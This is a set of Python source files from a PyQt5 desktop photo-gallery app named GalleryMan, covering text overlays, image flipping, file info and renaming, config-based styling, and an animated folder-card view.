def updateStyling(self):
# Change the text with the new text
self.label.setText(self.storedValue["text"])
# Resize the box with the new text
self.resizeToContent(self.label.text())
# Stylings
self.label.setStyleSheet(
"""
color: {};
background-color: transparent;
font-size: {}px;
font-family: {};
""".format(
self.storedValue["color"],
self.storedValue["font-size"],
self.storedValue["font-family"],
)
)
def swapLayout(self, layout):
# Get the central widget
self.central = self.scrollArea.parent()
# Animation callback
def animation_callback():
# Hide the scrollarea while it is updated
self.scrollArea.hide()
new_label.setGeometry(self.scrollArea.takeWidget().geometry())
new_label.setLayout(layout)
self.scrollArea.setWidget(new_label)
# Show the area
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.scrollArea.show)
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def update(self, property, label):
        # Update the dictionary with the new values
self.storedValue[property] = label.text()
# Update the styling with the new values
self.updateStyling()
def createGraphics(self):
# Create a scene
self.scene = QGraphicsScene()
# Set geometry
self.graphics.setGeometry(QRect(0, 0, self.parent.width() , self.parent.height()))
# Add scene
self.graphics.setScene(self.scene)
# Add pixmap
self.scene.addPixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")))
# Show the graphics
self.graphics.show()
# Move to the top
self.graphics.setAlignment(Qt.AlignTop | Qt.AlignLeft)
# Create a draggable label
self.label = DraggableLabel(None)
# Set text
self.label.setText("Your Text")
# Stylings
self.label.setStyleSheet("""
background-color: transparent;
font-size: 40px;
color: #88C0D0;
font-family: Comfortaa
""")
# Move to desired location
self.label.move(QPoint(100 , 100))
# Add to scene
self.scene.addWidget(self.label)
# Show the label
self.label.show()
self.shortcut = QShortcut(QKeySequence("Ctrl+S") , self.graphics)
self.shortcut.activated.connect(self.saveText)
self.updateStyling()
self.showHelp()
self.original = self.parent.geometry()
self.graphics.paintEvent = self.responser
def resizeToContent(self, text):
# Get the width and the height of the and set size accordingly
font = QFont(
self.storedValue["font-family"], int(self.storedValue["font-size"])
)
met = QFontMetrics(font)
width = met.width(text)
height = met.height()
self.label.setText(text)
self.label.setFixedSize(width, height)
self.label.adjustSize()
def saveText(self):
# Callback
def callback():
self.graphics.hide()
self.out_widget.set_pixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")))
# Open the image
self.image = Image.open(self.dir)
# Get the geometry
area = QRect(0 , 0 , self.image.width , self.image.height)
# Parse the image
image = QImage(area.size(), QImage.Format_ARGB32_Premultiplied)
painter = QPainter(image)
self.scene.render(painter, QRectF(image.rect()), QRectF(area))
painter.end()
# Save the new image
image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
# Hide the graphics
self.animation = Animation.fadingAnimation(Animation , self.graphics , 200)
self.animation.finished.connect(callback)
self.animation.start()
self.shortcut.setKey(QKeySequence())
def manageMenu(self):
stylesheet = """
border: 1px solid #4C566A;
padding: 10px;
padding-left: 10px;
color: white;
"""
self.menu = QSliderMenu(self.graphics)
# Show the menu
self.menu.show()
# Set alignment
self.menu.setAlignment(Qt.AlignTop | Qt.AlignRight)
for name in ["Text", "Color" , "Font Family" , "Font Size"]:
# Create a input and set size and styles accordingly
inputLabel = QLineEdit()
inputLabel.setAlignment(Qt.AlignLeft | Qt.AlignTop)
inputLabel.setPlaceholderText(name)
inputLabel.setStyleSheet(stylesheet)
inputLabel.textChanged.connect(partial(self.update, name.lower().replace(' ' , '-') , inputLabel))
self.menu.addMenu(name , inputLabel)
# Move the menu to outside of the screen
self.menu.move(QPoint(self.graphics.width() + 200, 0))
# Move it inside the screen with animation
self.animation = Animation.movingAnimation(
Animation, self.menu, QPoint(self.parent.width() - self.menu.width(), 0), 300
)
self.animation.start()
def showHelp(self):
def run_second():
self.helpLabel.show()
self.animation = Animation.fadingAnimation(Animation , self.helpLabel , 300)
self.timer = QTimer(self.parent)
self.timer.setSingleShot(True)
self.timer.timeout.connect(self.animation.start)
self.animation.finished.connect(self.helpLabel.hide)
self.timer.start(500)
self.helpLabel = QLabel(self.graphics)
self.helpLabel.setGeometry(self.graphics.geometry())
self.helpLabel.setStyleSheet("background-color: rgba(46, 52, 64, 155); font-size: 30px")
self.helpLabel.setText("Press Ctrl+S to save and exit")
self.helpLabel.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
self.helpLabel.show()
self.animation = Animation.fadingAnimation(Animation , self.helpLabel , 300 , True)
self.animation.finished.connect(run_second)
self.animation.start()
def responser(self , event):
try:
if(self.parent.geometry() == self.original): return QGraphicsView.paintEvent(self.graphics , event)
except:
return
self.original = self.parent.geometry()
self.startAni.move(QPoint(
self.parent.width() - self.startAni.width() - 10,
10
))
self.openNewPos = QPoint(self.parent.width() - self.menu.width() , 0)
if(self.menu.pos().x() != self.graphics.width() + 200):
self.animation = Animation.movingAnimation(Animation , self.menu , self.openNewPos , 200)
self.animation.start()
return QGraphicsView.paintEvent(self.graphics , event)
class imageFlipper:
def __init__(self, renderArea, outParent) -> None:
# Make every args global
self.renderArea = renderArea
self.outParent = outParent
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.thread = QThread()
self.worker = LongProcessor()
def flipLeft(self):
# Callback
def animation_callback():
# Flip the image and set the pixmap (Updated one)
new_image = self.image.transpose(method=Image.FLIP_LEFT_RIGHT)
self.renderArea.set_pixmap(self.createPixmap(new_image))
new_image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
# Show the label after a partial hide
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, True, startValue=0.5
)
self.animation.start()
# Partial hide the label when the image is being processed
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, endValue=0.5
)
self.animation.start()
# Callback
self.animation.finished.connect(animation_callback)
def requestHandler(self , f):
pass
def flipTop(self):
# Animation callback
def animation_callback():
# Process the image
new_image = self.image.transpose(method=Image.FLIP_TOP_BOTTOM)
self.renderArea.set_pixmap(self.createPixmap(new_image))
new_image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
# Partial unhide
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, True, startValue=0.5
)
self.animation.start()
# Partial hide when the image is being processed
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, endValue=0.5
)
self.animation.start()
# Callback
self.animation.finished.connect(animation_callback)
def createPixmap(self, image):
if image.mode == "RGB":
r, g, b = image.split()
image = Image.merge("RGB", (b, g, r))
elif image.mode == "RGBA":
r, g, b, a = image.split()
image = Image.merge("RGBA", (b, g, r, a))
elif image.mode == "L":
image = image.convert("RGBA")
im2 = image.convert("RGBA")
data = im2.tobytes("raw", "RGBA")
qim = QImage(data, image.size[0], image.size[1], QImage.Format_ARGB32)
pixmap = QPixmap.fromImage(qim)
return pixmap
```
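One non-obvious detail in `createPixmap` above: PIL's `tobytes("raw", "RGBA")` byte order and `QImage.Format_ARGB32` disagree on little-endian machines, which is why the red and blue channels are swapped before the bytes are handed to Qt. A minimal standalone sketch of the same round trip (the image path is hypothetical, and a `QApplication` must exist before building a `QPixmap`):
```python
from PIL import Image
from PyQt5.QtGui import QImage, QPixmap

def pil_to_pixmap(image):
    # Format_ARGB32 is laid out as B,G,R,A bytes on little-endian machines,
    # so swap R and B before handing PIL's raw RGBA bytes to Qt
    image = image.convert("RGBA")
    r, g, b, a = image.split()
    data = Image.merge("RGBA", (b, g, r, a)).tobytes("raw", "RGBA")
    qim = QImage(data, image.width, image.height, QImage.Format_ARGB32)
    return QPixmap.fromImage(qim)

# pixmap = pil_to_pixmap(Image.open("some_image.png"))  # hypothetical path
```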
#### File: GalleryMan/utils/infoFinder.py
```python
from PyQt5.QtGui import QKeySequence, QPixmap
from GalleryMan.assets.QtHelpers import Animation, PopUpMessage
import os
from PIL import Image
from PyQt5.QtCore import QRect, Qt
from PyQt5.QtWidgets import QGraphicsScene, QGraphicsView, QLabel, QLineEdit, QShortcut, QVBoxLayout
class getMoreInfo:
def __init__(self , scrollArea , renderArea , directory , application) -> None:
# Make every arg global
self.renderArea = renderArea
self.scrollArea = scrollArea
self.directory = directory
self.application = application
self.message = PopUpMessage()
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
def getInfo(self):
        # To prevent recreating the parent over the widget, hide the existing parent beforehand
try:
self.animation = Animation.fadingAnimation(Animation , self.parent , 100)
self.animation.finished.connect(self.parent.hide)
self.animation.start()
except Exception as e:
pass
# Check if the rename option is not opened
try:
self.animation = Animation.fadingAnimation(Animation , self.renameParent , 100)
self.animation.finished.connect(self.renameParent.hide)
self.animation.start()
except:
pass
# Create a label
self.parent = QLabel(self.renderArea)
# Set a special property to prevent addition of the border on the child labels
self.parent.setProperty("class" , "need")
# Set geometry
self.parent.setGeometry(self.renderArea.geometry())
# Stylings
        self.parent.setStyleSheet("""
            QLabel[class="need"]{
                background-color: #2E3440;
            }
        """)
# Create a layout which would hold every child labels
layout = QVBoxLayout()
# File path child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("File Path: {}".format(self.directory))
layout.addWidget(filePath)
# File name child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("File Name: {}".format(self.directory[self.directory.rindex("/") + 1:]))
layout.addWidget(filePath)
width , height = Image.open(self.directory).size
# Resolution child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("Resolution: {} x {}".format(width , height))
layout.addWidget(filePath)
bytesSize = os.path.getsize(self.directory)
# File size child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("File Size: {} bytes ({} MB)".format(bytesSize , round(bytesSize / 1e+6 , 2)))
layout.addWidget(filePath)
# Set the widget
self.parent.setLayout(layout)
# Show the parent
self.parent.show()
def showInFullScreen(self):
self.graphics = QGraphicsView(self.application)
self.graphics.setGeometry(self.application.geometry())
self.graphics.setAlignment(Qt.AlignTop | Qt.AlignLeft)
self.scene = QGraphicsScene()
self.graphics.setScene(self.scene)
self.graphics.show()
self.scene.addPixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")).scaled(self.application.geometry().width() , self.application.geometry().height() , transformMode=Qt.SmoothTransformation))
self.graphics.show()
def rename(self):
try:
self.animation = Animation.fadingAnimation(Animation , self.renameParent , 100)
self.animation.finished.connect(self.renameParent.hide)
self.animation.start()
except:
pass
try:
self.animation = Animation.fadingAnimation(Animation , self.parent , 100)
self.animation.finished.connect(self.parent.hide)
self.animation.start()
except:
pass
# Create a label which will hold the text edit
self.renameParent = QLabel(self.renderArea)
self.renameParent.setProperty("class" , "need")
# New message
self.message.new_msg(self.application , "Press Enter To Rename File" , 400)
# Listen for Enter click events
key = QShortcut(QKeySequence("Return") , self.renameParent)
# Save the photo with a new filename on click
key.activated.connect(self.saveWithNew)
# Set geometry
self.renameParent.setGeometry(self.renderArea.geometry())
# Stylings
        self.renameParent.setStyleSheet("""
            QLabel[class="need"]{
                background-color: #2E344050;
            }
        """)
# Layout which will hold text edit
layout = QVBoxLayout()
# Input box
self.inputBox = QLineEdit()
# Sized
self.inputBox.setFixedHeight(50)
self.inputBox.setFixedWidth(1000)
# Placeholder
self.inputBox.setPlaceholderText("New file name: ")
# Stylings
self.inputBox.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
font-family: Comfortaa
""")
# Alignment
self.inputBox.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
# Add to layout
layout.addWidget(self.inputBox , alignment=Qt.AlignCenter | Qt.AlignCenter)
# Set layout
self.renameParent.setLayout(layout)
# Show the label
self.renameParent.show()
def callback(self):
pass
def saveWithNew(self):
try:
self.image.save(self.inputBox.text())
self.animation = Animation.fadingAnimation(Animation , self.renameParent , 300)
self.animation.start()
except:
self.message.new_msg(self.application , "Invalid File Extension" , 400)
```
#### File: GalleryMan/utils/readers.py
```python
import os
from configparser import ConfigParser
def read_file(file_loc):
with open(file_loc) as file:
return file.read()
def change_with_config(stylesheet , config: ConfigParser = None , section: str = "folderPage"):
if(config == None):
config = ConfigParser()
config.read(os.path.join(os.path.expanduser("~") , ".config" , "galleryman", "config.ini"))
stylesheet = stylesheet.format(
backgroundColor=config.get(section , "background-color"),
lolcat=config.get(section , "headerText-color"),
headerFontFamily=config.get(section , "headerText-fontFamily"),
headerFontSize=config.get(section , "headerText-fontSize") + "px"
)
return [stylesheet , config]
```
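For reference, a minimal sketch of how `change_with_config` is meant to be driven. The template string and the config values below are made up; only the placeholder names (`backgroundColor`, `lolcat`, `headerFontFamily`, `headerFontSize`) and the option keys mirror what the function actually reads:
```python
from configparser import ConfigParser
from GalleryMan.utils.readers import change_with_config

# Hypothetical template; doubled braces survive .format() as literal CSS braces
template = "QLabel {{ color: {lolcat}; background-color: {backgroundColor}; " \
           "font-family: {headerFontFamily}; font-size: {headerFontSize} }}"

config = ConfigParser()
config["folderPage"] = {  # assumed values; option names taken from the reads above
    "background-color": "#2E3440",
    "headerText-color": "#D8DEE9",
    "headerText-fontFamily": "Comfortaa",
    "headerText-fontSize": "30",
}

styled, config = change_with_config(template, config)
print(styled)  # -> QLabel { color: #D8DEE9; ... font-size: 30px }
```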
#### File: GalleryMan/views/folderview.py
```python
from configparser import ConfigParser
import functools , json , os , pathlib
from random import randint
from PyQt5.QtCore import QObject, QParallelAnimationGroup, QPoint, QRect, QSize, QThread, QTimer, pyqtSignal, pyqtSlot
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QDialog, QHBoxLayout, QLabel, QMainWindow, QPushButton, QScrollArea, QVBoxLayout, QWidget
from PyQt5.QtGui import QCursor, QPixmap
from GalleryMan.assets.singleFolder import CustomLabel, singleFolderView
from GalleryMan.assets.QtHelpers import Animation, PopUpMessage, QCustomButton
class QDoublePushButton(QPushButton):
doubleClicked = pyqtSignal()
clicked = pyqtSignal()
def __init__(self, *args, **kwargs):
QPushButton.__init__(self, *args, **kwargs)
self.timer = QTimer()
self.timer.setSingleShot(True)
self.timer.timeout.connect(self.clicked.emit)
super().clicked.connect(self.checkDoubleClick)
@pyqtSlot()
def checkDoubleClick(self):
if self.timer.isActive():
self.doubleClicked.emit()
self.timer.stop()
else:
self.timer.start(250)
class PixmapHeaderMaker(QObject):
finished = pyqtSignal()
def run(self , inst , parent , imageArea: QLabel , border , width , height , dir):
        # Special treatment for the liked folder
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
if(dir == LIKED_FOLDERS):
with open(dir) as f:
data = json.loads(f.read())
data = list(filter(lambda x: os.path.isfile(x) , data))
if(data == []):
parent.hide()
return
path = data[0]
else:
path = imagesFolder.get_first(dir)
if(path == None):
parent.hide()
else:
inst.no += 1
imageArea.setPixmap(
QPixmap(path).scaled(
width - (int(border) * 2),
height - 52,
transformMode=Qt.SmoothTransformation,
)
)
inst.addFolder(parent)
inst.responser(None)
self.finished.emit()
class Worker(QObject):
finished = pyqtSignal()
def run(self , inst , mode , colors , x , y , width , height , padding , includeFavs=True):
color_rest = 0
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
inst.dirs = [LIKED_FOLDERS] + inst.dirs
# Iterate through all the dirs
for i in inst.dirs:
# Create a complete path of the folder
if(i != LIKED_FOLDERS):
curr = os.path.join(os.path.expanduser("~") , i)
else:
curr = i
# Check if the path is a folder and it is not in the prevent dirs
if i == LIKED_FOLDERS or (os.path.isdir(curr) and i[0] != "." and curr not in inst.prevented_dirs):
if mode == "single":
color_rest = 0
elif mode == "random":
                    color_rest = randint(0, len(colors) - 1)
else:
color_rest = (color_rest + 1) % len(colors)
res = imagesFolder.update(inst , curr, x, y, False, colors[color_rest])
if res:
x += width + padding
if x > inst.window.width() - width:
x = 40
y += height + padding
self.finished.emit()
class imagesFolder:
"""Creates The UI"""
def __init__(
self,
window: QWidget,
main_window: QMainWindow,
scroll: QScrollArea,
config: ConfigParser,
topbar: QWidget,
app
) -> None:
self.app = app
self.topbar = topbar
self.main_window = main_window
self.isshown = False
self.scroll = scroll
self.scroll.horizontalScrollBar().setValue(0)
self.scroll.horizontalScrollBar().valueChanged.connect(
lambda: self.scroll.horizontalScrollBar().setValue(0)
)
self.originalPos = 0
self.currentWindow = "albums"
self.window = window
self.config = config
        # Starting y-offset of the folder cards; tracks where the next row of folders will be placed
self.folderStartValue = 250
self.popup = PopUpMessage()
# A label which will contain all the folders
self.images = QLabel(self.window)
# Change the geometry
self.images.setGeometry(QRect(0, 0, 1980, 1080))
self.images.show()
self.trashFoldersLayout = None
self.allFolders = []
    def start(self, label_to_change: QLabel) -> bool:
        """Creates The Ui And Renders To The MainWindow passed during __init__
Args:
label_to_change (QLabel): The header text, which will be changed to the "Albums"
"""
self.scroll.verticalScrollBar().setEnabled(True)
self.scroll.verticalScrollBar().show()
# Initing all the variables that will be used
self.folders_pinned = []
self.allFolders = []
self.dirs = os.listdir(os.path.expanduser("~"))
self.label_to_change = QLabel(text="Albums", parent=self.window)
self.label_to_change.setGeometry(label_to_change.geometry())
self.label_to_change.setAlignment(label_to_change.alignment())
self.posX = self.label_to_change.y()
self.label_to_change.setStyleSheet("""
color: {};
font-family: {};
font-size: {}px;
""".format(
self.config.get("folderPage" , "headerText-color"),
self.config.get("folderPage" , "headerText-fontFamily"),
self.config.get("folderPage" , "headerText-fontSize"),
))
self.label_to_change.show()
# Change The Name Of The Window
self.window.setObjectName("PyGallery")
# Set Geometry
self.window.setGeometry(0, 0, 1900, 1000)
# Now, Folder's Header Text
self.folderHeaderText = QLabel(self.images)
# Change StyleSheet
self.folderHeaderText.setStyleSheet(
"""color: {}; font-family: {}; font-size: {}px;""".format(
self.config.get("folderPage", "folders-folderNameColor"),
self.config.get("folderPage", "folders-folderNameFontFamily"),
self.config.get("folderPage", "folders-folderNameSize"),
)
)
# Set Fixed Width And Height
self.folderHeaderText.setFixedHeight(50)
self.folderHeaderText.setFixedWidth(200)
# Move To Desired Position
self.folderHeaderText.move(QPoint(40, 170))
# Change Text
self.folderHeaderText.setText(
self.config.get("folderPage", "folders-icon")[1:-1] + "Folders"
)
# Show The Text
self.folderHeaderText.show()
# Get all the prevented directory selected during the startup
self.prevented_dirs = json.loads(
open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "scan_dirs.txt")).read()
)
# Create x and y variables which will determine the position of the folder's card
x, y = 40, self.folderStartValue
height, width = int(self.config.get("folderPage", "folders-height")), int(
self.config.get("folderPage", "folders-width")
)
height += int(self.config.get("folderPage", "folders-borderWidth"))
padding = int(self.config.get("folderPage", "folders-padding"))
mode = self.config.get("folderPage", "folders-mode")[1:-1]
colors = json.loads(self.config.get("folderPage", "folders-color"))
self.keybindings = json.loads(
self.config.get("folderPage", "folderPage-keybindings")
)
self.no = 0
self.thread = QThread(self.main_window)
self.worker = Worker()
self.worker.moveToThread(self.thread)
self.thread.started.connect(lambda : self.worker.run(self , mode , colors , x , y , width , height, padding))
self.worker.finished.connect(self.thread.quit)
self.worker.finished.connect(self.createBar)
self.thread.start()
perline = max((self.main_window.size().width() - 100) // width , 1)
self.width = (
self.label_to_change.height()
+ ((width + padding) * max(self.no , 1) // perline)
- padding
)
self.width = max(self.width, self.main_window.size().height() - 200)
self.window.setFixedHeight(self.width)
self.images.setFixedHeight(self.width)
# Display the desired message if no cards are there under the folder's header
if self.allFolders == []:
self.showMessage()
self.main_window.resizeEvent = self.responser
self.main_window.show()
# Final touches, call the responser to position the cards accurately, if it's not
self.responser(None)
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "galleryman.status") , "w") as f:
f.write("REGISTERED")
# End of the function by returning True
return True
def createBar(self):
self.panel = QLabel(self.main_window)
self.panel.setStyleSheet("background-color: {}".format(self.config.get("folderPage" , "bar-backgroundColor")))
self.layout = QHBoxLayout()
func = [self.switchToAlbums , self.moveToTrash]
i = 0
for icon , color , size , family in json.loads(self.config.get("folderPage" , "bar-icons")):
self.albums = QCustomButton(icon , None).create()
self.albums.clicked.connect(func[i])
i += 1
self.layout.addWidget(self.albums)
self.albums.setStyleSheet("color: {}; font-size: {}px; font-family: {}".format(
color , size , family
))
self.panel.setGeometry(QRect(0 , self.main_window.height() - 64 , self.main_window.width() , 64))
self.panel.show()
self.panel.setLayout(self.layout)
def update(self, dir: str, x: int, y: int, is_pinned: bool, color: str) -> bool:
"""
Creates the card of the folder
# Args:
dir (str): The path of the folder whose card needs to be created
x (int): the x position where the card will be visible
y (int): the y position where the card will be visible
is_pinned (bool): Is the folder pinned?
# Return
            bool: Whether creating the folder is worthwhile
"""
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
# Create a Button For The Card
label = QDoublePushButton("", self.images)
if dir in self.keybindings:
label.setShortcut(self.keybindings[dir])
# Set PointingHand Cursor
label.setCursor(QCursor(Qt.PointingHandCursor))
if dir in self.keybindings:
label.setShortcut(self.keybindings[dir])
        # Set a special property so the border stylesheet targets only this card
label.setProperty("class", "image")
border = self.config.get("folderPage", "folders-borderWidth")
# Set the stylesheet
label.setStyleSheet(
"""
QPushButton[class="image"]{{
border: {}px solid {};
}}
""".format(
border, color
)
)
height, width = int(self.config.get("folderPage", "folders-height")), int(
self.config.get("folderPage", "folders-width")
)
# Set Fixed Width And Height
label.setFixedHeight(height + int(border))
label.setFixedWidth(width)
# Create A Label for showing the first picture
imageArea = QLabel(label)
# Set the Alignment
imageArea.setAlignment(Qt.AlignCenter)
# Set fixed width and height
imageArea.setFixedHeight(height - 52)
imageArea.setFixedWidth(width - (int(border) * 2))
# Move a little bit aside for showing the border
imageArea.move(QPoint(int(border), int(border)))
worker = PixmapHeaderMaker()
self.another = QThread(self.window)
self.another.started.connect(lambda : worker.run(self , label , imageArea , border , width , height , dir))
        worker.finished.connect(self.another.quit)
        worker.finished.connect(lambda : self.responser(None))
worker.moveToThread(self.another)
self.another.start()
# A Label to show the name of the directory
folderName = QLabel(label)
# Set fixed width and height
folderName.setFixedHeight(50)
folderName.setFixedWidth(width - (int(border) * 2))
folderName.move(QPoint(int(border), height - 52))
folderName.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
# Set some styles
folderName.setStyleSheet(
"color: {}; font-family: {}; font-size: {}px; padding-top: {}px".format(
self.config.get("folderPage", "folderName-color"),
self.config.get("folderPage", "folderName-fontFamily"),
self.config.get("folderPage", "folderName-fontSize"),
self.config.get("folderPage", "folderName-topPadding"),
)
)
# Set alignment
folderName.setAlignment(Qt.AlignCenter)
# Change the text of the label with the folder's name
if(dir != LIKED_FOLDERS):
folderName.setText(dir[dir.rindex("/") + 1 :])
else:
folderName.setText("Favourites")
        # Move the card to the desired position
label.move(QPoint(x, y))
        # Store the directory on the card as a property; helpful when pinning
label.setProperty("directory", dir)
label.show()
# Move to the next page (which shows all the available images in a folder)
label.clicked.connect(lambda: self.transfer_control(dir))
# QBalloonToopTip(self.images , self.main_window).show()
# Return True, nothing is better than that XD
return True
def addFolder(self , folder):
self.allFolders.append(folder)
    @staticmethod
    def get_first(dir: str) -> str:
"""Returns the first image in the folder, or None if no image is available
Args:
dir (str): [description]
Returns:
str: [description]
"""
# Iterate through all the files and folders in the directory
for i in pathlib.Path(dir).rglob("*"):
i = str(i)
# Check if the image is a supported one
            if i.lower().endswith((".png", ".jpeg", ".jpg", ".webp")) and not os.path.isdir(
                "{}/{}".format(dir, i)
            ):
return i
return None
def responser(self, event=None):
"""Sets the geometry of the widgets according to the new width of the window
Args:
event (QEvent): Event passed during the resizing, not used
"""
# Get the necessary items from config
card_height, card_width, padding = (
int(self.config.get("folderPage", "folders-height")),
int(self.config.get("folderPage", "folders-width")),
int(self.config.get("folderPage", "folders-padding")),
)
# Hide the messages if the folders is not empty
if self.allFolders != []:
self.hide_msg()
# Check how many cards can fit in one line
self.per_line = max((self.main_window.width() - 140) // card_width, 1)
# New x and y positions
x, y = 40, 220
# Create a parallel animation group
self.an = QParallelAnimationGroup()
# Create a animation for the header if it is available
try:
self.an.addAnimation(
Animation.movingAnimation(
Animation,
self.folderHeaderText,
QPoint(40, self.folderStartValue - 80),
100,
)
)
except:
pass
self.topbar.move(QPoint(self.main_window.width() - 200 , 0))
x, y = 40, self.folderStartValue
for i in self.allFolders:
self.an.addAnimation(
Animation.movingAnimation(Animation, i, QPoint(x, y), 100)
)
# Update x and y
x += card_width + padding
if x > self.main_window.width() - 240:
x = 40
y += card_height + padding
x, y = 40, self.folderStartValue
try:
for i in self.trashItem:
self.an.addAnimation(
Animation.movingAnimation(Animation, i, QPoint(x, y), 100)
)
# Update x and y
x += card_width + padding
if x > self.main_window.width() - 240:
x = 40
y += card_height + padding
except:
pass
# Check if the msg exists
try:
self.an.addAnimation(
Animation.movingAnimation(
Animation, self.msg, QPoint(100, self.folderStartValue + 310), 100
)
)
except:
pass
self.width = (
self.label_to_change.height()
+ ((card_height + padding) * max(self.no , 1) // self.per_line)
+ self.folderHeaderText.height()
+ padding
)
self.width = max(self.width, self.main_window.size().height())
self.window.setFixedHeight(self.width)
self.images.setFixedHeight(self.width)
self.label_to_change.setFixedWidth(self.main_window.size().width())
try:
self.trashFolderHeader.setFixedWidth(self.main_window.size().width())
except:
pass
self.label_to_change.setAlignment(Qt.AlignCenter)
# Start the animation
self.an.start()
# Set the width and height of the panel
try:
self.panel.setGeometry(QRect(
0,
self.main_window.height() - 64,
self.main_window.width(),
64
))
except:
pass
def pushDown(self):
# Pushing down effect of the info
self.anim = QParallelAnimationGroup()
try:
self.anim.addAnimation(Animation.fadingAnimation(Animation, self.info, 200))
except:
pass
self.anim.addAnimation(
Animation.movingAnimation(
Animation,
self.folderHeaderText,
QPoint(40, self.folderHeaderText.pos().y() + 400),
200,
)
)
# Start the animation
self.anim.start()
# Hide the info on being animated
self.anim.finished.connect(lambda: self.info.hide())
def showMessage(self):
# Create a msg label
self.msg = QLabel(
parent=self.window,
text="Oops! Your unselected folders do no contain any image!",
)
# Set perfect geometry
self.msg.setGeometry(QRect(4000, 100, 1980, 100))
# Some styling
self.msg.setStyleSheet(
"""
QLabel{
font-size: 25px;
color: #4C566A;
}
"""
)
try:
Animation.fadingAnimation(Animation, self.msg, 400).start()
except:
pass
self.msg.show()
def hide_msg(self):
# Hides message
try:
self.ani = Animation.fadingAnimation(Animation, self.msg, 200, True)
self.ani.start()
self.ani.finished.connect(lambda: self.msg.hide())
except:
pass
def update_styling(self):
"""
Updates The Styling Of The Main Window After Adding A Property
"""
self.window.style().unpolish(self.window)
self.window.style().polish(self.window)
self.window.update()
def transfer_control(self, directory):
"""Transfers control to the singleFolderPage"""
# Parallel Animation Group
self.effects = QParallelAnimationGroup()
self.effects.addAnimation(
Animation.fadingAnimation(Animation, self.images, 400)
)
self.effects.addAnimation(
Animation.fadingAnimation(Animation, self.label_to_change, 400)
)
self.effects.addAnimation(
Animation.movingAnimation(Animation , self.panel , QPoint(0 , 1000) , 400)
)
self.effects.start()
# Run second slot of animations
self.effects.finished.connect(lambda: self.run_second(directory))
def run_second(self, dir):
self.folderHeaderText.hide()
self.args = []
try:
if not self.msg.isHidden():
self.args.append(self.msg)
self.msg.hide()
except:
pass
try:
if not self.info.isHidden():
self.args.append(self.info)
self.info.hide()
except:
pass
self.label_to_change.hide()
inst = singleFolderView()
# inst.init(self.window,
# dir,
# self.config,
# self.scroll,
# self.main_window,
# self.app,
# self.label_to_change,
# self.images,
# self.folderHeaderText,
# self.topbar,
# *self.args)
inst.init(self.window , dir , self.config , self.scroll , self.main_window , self.app , self.topbar , self.panel , self.folderHeaderText)
def createTrashLayout(self):
self.trashFoldersLayout = QLabel(self.images.parent())
self.trashFoldersLayout.setGeometry(self.images.geometry())
x , y = 40 , self.folderStartValue
mode = self.config.get("folderPage", "folders-mode")[1:-1]
colors = json.loads(self.config.get("folderPage", "folders-color"))
height, width = int(self.config.get("folderPage", "folders-height")), int(
self.config.get("folderPage", "folders-width")
)
height += int(self.config.get("folderPage", "folders-borderWidth"))
padding = int(self.config.get("folderPage", "folders-padding"))
self.trashItem = []
        for file in os.listdir(os.path.join(os.path.expanduser('~') , ".galleryman" , "data" , "trashFiles")):
label = CustomLabel(self.trashFoldersLayout , Qt.RightButton)
label.setGeometry(QRect(
x , y,
width , height
))
            label.clicked.connect(functools.partial(self.showDeleteOptions , os.path.join(os.path.expanduser('~') , ".galleryman" , "data" , "trashFiles" , file) , label))
label.setPixmap(QPixmap(os.path.join(os.path.expanduser('~') , ".galleryman" , "data" , "trashFiles" , file)))
label.setScaledContents(True)
label.setStyleSheet("border: 10px solid #88C0D0")
x += width + padding
if(x > self.main_window.width()):
x = 40
y += height + padding
label.show()
self.trashItem.append(label)
self.trashFoldersLayout.show()
def moveToTrash(self):
if(self.currentWindow == "trash"): return
self.currentWindow = "trash"
def run_second():
self.label_to_change.hide()
self.animation = QParallelAnimationGroup()
self.createTrashLayout()
self.trashFolderHeader = QLabel(self.trashFoldersLayout)
self.trashFolderHeader.setGeometry(self.label_to_change.geometry())
